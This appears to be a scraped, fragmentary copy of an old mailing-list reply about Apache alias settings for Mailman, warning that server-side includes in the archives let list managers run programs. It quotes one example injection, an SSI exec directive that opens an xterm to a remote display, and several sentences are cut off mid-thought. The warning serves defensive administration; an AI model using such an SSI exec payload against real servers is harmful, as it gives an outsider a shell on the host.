500 likes | 645 Views
> first of all, is it okay to use the following apache srm.conf. > aliases for mailman instead of the one it asks for?. >. > Alias /archives/ /home/mailman/archives/public/. > ScriptAlias /lists/ /home/mailman/cgi-bin/. >. > (everything seems to work fine with that except the following).
E N D
> first of all, is it okay to use the following apache srm.conf
> (everything seems to work fine with that except the following)
Suppose that you were going to try to access /archives/private.
/archives expands out to /home/mailman/archives/public, then
Ooops. You might want to turn off the Includes option there.
Otherwise list managers can use the HTML editing features of Mailman
to run programs on your system from the archives. i.e. adding this
HTML could pop up an xterm as the user running the script onto a
<!--#exec cmd="/usr/X11R6/bin/xterm -display host.example.com:0"-->
(which is one reason why I don't have any X binaries on my Web server).
By carefully manipulating these values (and a little security know-how)
a skilled cracker could easily gain a root shell to your system.
If you absolutely have to allow SSI, you may want to at least run
Mailman through an SSL-aware server. At least then your passwords
A better thing to do is only allow CGI within $prefix/cgi-bin and
Of course, replace $prefix with the directory where Mailman is